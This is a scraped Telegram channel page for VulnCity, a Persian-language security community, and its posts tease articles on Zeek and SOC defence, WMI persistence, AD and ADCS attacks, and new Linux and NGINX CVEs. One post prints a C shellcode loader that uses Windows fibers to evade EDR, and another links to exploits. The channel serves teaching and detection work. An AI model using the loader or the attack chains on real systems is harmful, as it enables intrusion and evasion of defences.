TGViewer
Channel Public Channel
#! VulnCity

#! VulnCity

@vulncity

🔒 VulnCity
HTTPS://vulncity.com
Subscribers
247
Photos
36
Videos
1
Links
47

Showing posts older than #68 · Back to latest

Older Posts 20 shown
Post #67 180
روش‌های نفوذ به Active Directory

🆔 @vulncity
  • 👏 2
Post #66 602
🔥سرویس WMI؛ یکی مکانیزم‌های Persistence در ویندوز
ا WMI فقط یک API مدیریتی ویندوز نیست؛ یک Subsystem قدرتمند برای Query، Eventing و Automation است که سال‌هاست توسط مهاجمان برای Persistence و Lateral Movement مورد سوءاستفاده قرار می‌گیرد.

در این مقاله به‌صورت عمیق بررسی کردیم:

🔹 معماری داخلی WMI و نقش WmiPrvSE.exe و winmgmt
🔹 ساختار OBJECTS.DATA و نحوه ذخیره Subscriptionها در CIM Repository
🔹 اجزای اصلی Persistence شامل:

ا __EventFilter
ا CommandLineEventConsumer
ا __FilterToConsumerBinding

🔹 سناریوهای عملی:

ا Trigger شدن Payload با اجرای notepad.exe
ا Persistence مبتنی بر MOF
ا #PRAGMA AUTORECOVER و بازگشت خودکار Persistence پس از Rebuild شدن Repository
ا ترکیب WMI با Scheduled Task و Registry برای ایجاد Double Persistence
ا استفاده از WMI برای Lateral Movement و اجرای کد روی سیستم‌های Remote

از دید Blue Team هم موارد زیر را بررسی کردم:

🛡 شناسایی Subscriptionهای مخرب
🛡 مانیتورینگ WmiPrvSE.exe Child Processها
🛡 Detection با Sysmon Event IDهای 19، 20 و 21


مشاهده مقاله

🆔 @vulncity
  • 👍 2
  • ❤ 1
Post #64 179
✅ قابلیت Streak روی سایت فعال شد
با فعالیت میتونی از ۵ تا ۳۵ vulcoin در روز دریافت کنی
  • 👏 3
Post #63 248
📊 گزارش خرداد ماه — VulnCity

یک ماه پر از پیشرفت برای جامعه امنیت سایبری VulnCity 🚀
👥 ۱۷ کاربر فعال (+۱۴ نفر این ماه)

📝 ۲۳ مقاله منتشرشده (+۹ مقاله این ماه)

🏆 برترین مقاله ماه: «پیاده‌سازی Zeek برای مانیتورینگ»

📦 ۱۳ منبع آموزشی (+۲ منبع جدید)
✨ این ماه دو بخش جدید لانچ شد:

💬 Chat — گفتگوی خصوصی و گروهی
📰 Feed — فید سوال و پاسخ تخصصی
🪙 و سیستم VulnCoin هم فعال شد — واحد پول داخلی که با فعالیت کسب می‌شه و برای رویدادها و منابع خرج می‌شه.
🎯 ماه آینده: فعال‌سازی بخش رویدادها و برگزاری اولین رویداد آنلاین
شروع کرده‌ایم؛ آرام اما پیوسته در مسیر امنیت سایبری؛ جات کنار ما خالیه.
🔗 vulncity.com

🆔 @vulncity
  • 👏 4
  • ❤ 1
Post #61 551
شناسایی تهدیدات شبکه با Zeek
اگر مهاجم از DNS داده خارج می‌کند، یا با SMB در شبکه حرکت می‌کند — Zeek همه چیز را لاگ می‌کند.
در این مقاله، تحلیل پروتکل‌های اصلی را به صورت عملیاتی پوشش دادیم:

ا DNS Tunneling — بررسی فیلدهایی مثل query_len و شناسایی داده‌های کدگذاری‌شده در کوئری‌ها
ا SMB & Lateral Movement — تحلیل لاگ‌های smb_files, smb_mapping, dce-rpc و شناسایی اجرای Fileless (فیلدهای size=0)
ا Phishing — ردیابی لینک و ضمیمه مخرب از طریق smtp.log و files.log
ا TLS/C2 — توضیح کامل JA3 Fingerprinting؛ از نحوه ساخت هش تا شناسایی هویت کلاینت‌های مخرب در ترافیک رمزنگاری‌شده

همچنین نصب و راه‌اندازی پلاگین‌های کلیدی مثل BZAR (نگاشت خودکار رفتار به MITRE ATT&CK) و Intel Framework را گام‌به‌گام توضیح دادیم.

اگر هنوز Zeek را راه‌اندازی نکردی، راهنمای نصب و پیکربندی اولیه را قبلاً در سایت منتشر کردیم — پیشنهاد می‌کنیم اول از آنجا شروع کنی.


مشاهده کامل مقاله Zeek Threat Hunting

راهنمای راه اندازی Zeek

🆔 @vulncity
  • 👍 2
  • ❤ 1
Post #60 219
دفاع سایبری با ابزارهای Open Source

🛡 ابزارهایی مثل Wazuh، Suricata و OpenCTI می‌توانند یک زیرساخت امنیتی جدی بسازند — اما «رایگان بودن لایسنس» با «بدون هزینه بودن» فرق دارد.

در یک مقاله کامل، تمام جزئیات پیاده‌سازی یک SOC متن‌باز پوشش داده شده: از Endpoint Security با Velociraptor و OSQuery، تا Network Hunting با Zeek و Suricata، Log Investigation با Graylog و OpenSearch، IOC Matching با YARA و SIGMA، و Threat Intelligence با MISP و OpenCTI — برای هر ابزار روش نصب، کاربرد، مزایا و معایب نسبت به رقبای تجاری توضیح داده شده.

🛠 اما واقعیت اینجاست: لایسنس رایگان است، نه پیاده‌سازی. این stack به تیم متخصص داخلی، ماه‌ها زمان برای Tune کردن، و پذیرش این واقعیت نیاز دارد که در بحران هیچ SLA رسمی‌ای پشت خط نیست.

مشاهده کامل مقاله

🆔 @vulncity
  • 👍 2
Post #58 204
راهنمای کامل؛ FPC و Arkime

🔍 ا Full Packet Capture (FPC) یعنی ضبط کامل frame‌های لایه ۲ تا ۷ در قالب فایل‌های PCAP — نه فقط لاگ یا متادیتا. header تمام لایه‌ها، payload رمزنگاری‌نشده، و timing دقیق هر بسته.
توجه: در ترافیک TLS/HTTPS بدون کلید یا SSL Inspection، payload خوانا نیست و metadata در دسترس است.

🛡 برای تیم‌های Arkime ، Blue Team ابزار اصلی پیاده‌سازی FPC در مقیاس enterprise است. این ابزار open-source از سه مؤلفه تشکیل شده: موتور capture برای ضبط بسته‌ها، viewer برای جستجو و تحلیل، و OpenSearch/Elasticsearch برای ایندکس metadata. از رصد passive دستگاه‌های OT/ICS (مثل Modbus، DNP3) بدون نیاز به Agent از طریق SPAN port یا Network TAP، تا تحلیل حملات APT و کشف Data Exfiltration — همه در یک پنل متمرکز قابل جستجو هستند.

💾 چالش اصلی FPC هزینه ذخیره‌سازی و پردازش است. استراتژی بهینه و لایه‌ای اینه که NetFlow/IPFIX برای کل شبکه (متادیتا، نگهداری بلندمدت)، FPC دائمی فقط روی سگمنت‌های حساس باشد یا FPC هدفمند on-demand هنگام هر Incident روی IP/port خاص فعال داشته باشید.

🔗مشاهده کامل مقاله
🆔 @vulncity
  • 👍 2
Post #57 193
✅ مشکل ثبت‌نام در سایت حل شد
Post #56 5.5K
راهنمای کامل Zeek برای مانیتورینگ

🔍 ا Syslog خیلی کمه، FPC خیلی گرونه. Zeek یه راه سومه که با یک‌درصد حجم FPC، خیلی از اطلاعاتی که نیاز داری رو بهت میده.

🏗 معماری Zeek هم standalone‌ هست، هم cluster. توی محیط‌های بزرگ هر node یه نقش داره: Worker ترافیک رو آنالیز می‌کنه، Logger لاگ می‌نویسه، Proxy هماهنگ می‌کنه و Manager کل cluster رو کنترل می‌کنه.

⚙️ پیکربندی اصلی توی node.cfg و local.zeek انجام میشه. با چند خط می‌تونی خروجی JSON فعال کنی و لاگ‌ها رو مستقیم به Elasticsearch بفرستی.

🕵️ا Zeek توی هر connection یه فیلد history ثبت می‌کنه. مثلاً الگوی ^D*d نشونه احتمالی یه Reverse Shell‌ه. conn_state برابر S0 در تعداد بالا هم معمولاً Port Scan رو نشون میده.

📂 لاگ‌هایی مثل conn، dns، http، ssl، ssh، smb، kerberos، weird و intel هر کدوم یه زاویه مشخص از ترافیک رو پوشش میدن.

🔧 مشکلات رایجی مثل Packet Drop، لاگ‌نشدن ترافیک و خطاهای Cluster Initialization هم توی مقاله کامل بررسی شدن.

مقاله کامل به همراه کدها

🆔 @vulncity
  • 👍 2
Post #55 218
#! VulnCity 🕶 ابزار پنهان: Windows Fiber بخش Fiber واحد اجرایی سبک‌وزنی در ویندوز است که برخلاف Thread، توسط سیستم‌عامل زمان‌بندی نمی‌شود و کنترل آن با برنامه‌نویس است. این ویژگی به مهاجمان اجازه می‌دهد shellcode را بدون ایجاد Thread جدید اجرا کرده و از EDRها فرار کنند.…
💻 پیاده‌سازی ShellCode Injection در C از طریق fiber
#include <Windows.h>

int main()
{
// Step 1 : Convert Thread to Fiber
PVOID mainFiber = ConvertThreadToFiber(NULL);

unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0..."; // shellcode bytes

// Step 2: Allocate executable memory
PVOID shellcodeLocation = VirtualAlloc(0, sizeof shellcode,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, shellcode, sizeof shellcode);

// Step 3: Create fiber for shellcode
PVOID shellcodeFiber = CreateFiber(NULL,
(LPFIBER_START_ROUTINE)shellcodeLocation,
NULL);

// Step 4: Schedule fiber — shellcode is executed
SwitchToFiber(shellcodeFiber);

return 0;
}


🆔 @vulncity
Post #54 214
🕶 ابزار پنهان: Windows Fiber
بخش Fiber واحد اجرایی سبک‌وزنی در ویندوز است که برخلاف Thread، توسط سیستم‌عامل زمان‌بندی نمی‌شود و کنترل آن با برنامه‌نویس است. این ویژگی به مهاجمان اجازه می‌دهد shellcode را بدون ایجاد Thread جدید اجرا کرده و از EDRها فرار کنند. APIهای CreateFiber و SwitchToFiber کمتر Hook می‌شوند و footprint کمتری نسبت به CreateRemoteThread دارند.
در عملیات‌های Red Team از Fiberها برای اجرای payload، stack spoofing و sleep obfuscation استفاده می‌شود. شناسایی این تکنیک برای متخصصان امنیت دفاعی ضروری است.
مشاهده مراحل حمله و POC ها

🆔 @Vulncity
  • ❤ 1
Post #52 174
دوستان عزیز سلام
ما تو Vulncity داریم یه پلتفرم بزرگ و خفن برای امنیت سایبری می‌سازیم؛ جایی که می‌تونید از دوستان متخصص و کاردرست مشاوره بگیرید، جدیدترین آسیب‌پذیری‌های روز رو چک کنید، خودتون مقاله بنویسید و با یه نقشه راه اصولی، مسیر هک و امنیت رو خیلی راحت‌تر پیدا کنید.

و اگه اهل چالش هستید و دوست دارید تو این مسیر هیجان‌انگیز همراه ما باشید، ما به شدت دنبال هم‌تیمی‌های جدید می‌گردیم! 🤝

خیلی خوشحال می‌شیم به سایت ما سر بزنید، ازش استفاده کنید و حتماً نظرات و پیشنهاداتتون رو بهمون بگید تا بتونیم با کمک هم هر روز بهترش کنیم. 👇

🔗 آدرس سایت: https://vulncity.com

💬 دمتون گرم، خیلی مشتاق شنیدن فیدبک‌هاتون و البته دیدنتون تو تیم هستیم!
  • 🔥 1
Post #51 177
🔐 نفوذ بدون هیچ Crednetial; پیاده سازی حمله Relay Kerberos Over DNS

این تکنیک پیشرفته با ترکیب IPv6، DNS Dynamic Updates و ADCS امکان نفوذ به شبکه‌های AD را بدون داشتن credential فراهم می‌کند.

📌 پیش‌نیازهای حمله:

• فعال بودن IPv6 در شبکه هدف
• وجود ADCS برای صدور گواهی
• قابلیت DNS Dynamic Updates (رکوردهای TKEY)
• دسترسی به شبکه داخلی (LAN)

🔗 شرح کامل مراحل این تکنیک
🆔 @vulncity
Post #50 160
🕳از کاربر عادی تا Domain Admin: سوءاستفاده از ADCS

⭕️ سرویس ADCS سرویسی در ویندوز سرور است که گواهی‌های دیجیتال صادر می‌کند و برای احراز هویت کاربران در شبکه استفاده می‌شود. اگر تنظیمات این سرویس درست پیکربندی نشود، یک کاربر عادی می‌تواند گواهی جعلی به نام Administrator دریافت کند و کنترل کامل دامنه را به دست بگیرد.

⭕️ ابزار Certipy-AD به مهاجمان کمک می‌کند تا این ضعف‌ها را پیدا کرده و از آن‌ها سوءاستفاده کنند. این حمله بدون نیاز به رمز عبور انجام می‌شود و یکی از خطرناک‌ترین روش‌های نفوذ به Active Directory است. برای جلوگیری از این حملات باید دسترسی‌های صدور گواهی را محدود کرد و رویدادهای مشکوک را رصد نمود.
در این مقاله تمام مراحل حمله و راه‌های دفاع به صورت عملی توضیح داده شده است.

🔗 شرح کامل مراحل این تکنیک
🆔 @vulncity
  • 👍 1
Post #48 153
🥷 وقتی مهاجم از در اصلی وارد میشه

🔴 زمانی که مهاجمان با یک Raspberry Pi به قیمت 10 دلار یا یک Mikrotik کوچک‌تر از جعبه سیگار، مستقیماً وارد شبکه شما می‌شوند. این تکنیک Hardware Initial Access نام دارد و راه نفوذی به شبکه‌های Air-Gapped و محافظت‌شده است.

🛡 دفاع چندلایه؛ تنها راه نجات:
تیم‌های Blue باید ترکیبی از NAC، Physical Audit منظم، Wireless IDS، RF Scanning، Behavioral Analysis و حتی Thermal Imaging را به کار بگیرند. شناسایی یک Raspberry Pi مخفی در پشت rack سرور نیازمند چیزی بیش از یک SIEM است؛ نیازمند چشم تیزبین و فرآیند منظم است.

مشاهده کامل مراحل حمله

🆔 @vulncity
Post #47 583
🚨 آسیب‌پذیری بحرانی NGINX Rift (CVE-2026-42945)

یک Heap Buffer Overflow با قدمت ۱۸ سال در ماژول Rewrite هسته NGINX کشف شد — امکان Remote Code Execution بدون احراز هویت.

🔴 CVSS Score: 8.1 (Critical)

🔴 نوع: Heap Buffer Overflow در ngx_http_rewrite_module

🔴 نسخه‌های آسیب‌پذیر:
• NGINX Open Source: 0.6.27 - 1.30.0
• NGINX Plus: R1 - R34

⚠️ Impact:
• Remote Code Execution (RCE)
• Denial of Service (DoS)
• Memory Disclosure (Private Keys, Credentials)

🎯 محیط‌های پرخطر:
•Internet Reverse Proxies
• API Gateways
• Kubernetes Ingress Controllers

✅ Mitigation:
• آپدیت به NGINX 1.30.1+ یا 1.31.0+
• Audit فایل‌های config برای patterns آسیب‌پذیر
• استفاده از named captures به‌جای unnamed


گزارش کامل در Vulncity

🆔 @vulncity
Post #46 476
🕳️ Copy Fail & Dirty Frag: وقتی یک splice() کافی است برای root شدن

دو آسیب‌پذیری بحرانی Copy Fail و Dirty Frag Ker در Kernel لینوکس کشف شدند که امکان دستیابی به دسترسی root را به کاربران محلی می‌دهند.

- Copy Fail (CVE-2026-31431) از سال ۲۰۱۷ در ماژول AF_ALG وجود داشته و با سوءاستفاده از splice() امکان تغییر مستقیم Page Cache را فراهم می‌کند.

- Dirty Frag (CVE-2026-43284 & CVE-2026-43500) ترکیبی از دو نقص در ماژول‌های xfrm-ESP و RxRPC است که از سال ۲۰۲۳ میلیون‌ها سیستم را تهدید کرده است.

این باگ‌ها با دستکاری حافظه Kernel، به مهاجم اجازه می‌دهند دسترسی بالایی به سیستم‌عامل بگیرد.

🔗View Report
🔗Dirty Flag CVE Details
🔗Copy Fail CVE Details
🔗Dirty Flag Exploit
🔗Copy Fail Exploit


🆔 @vulncity
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →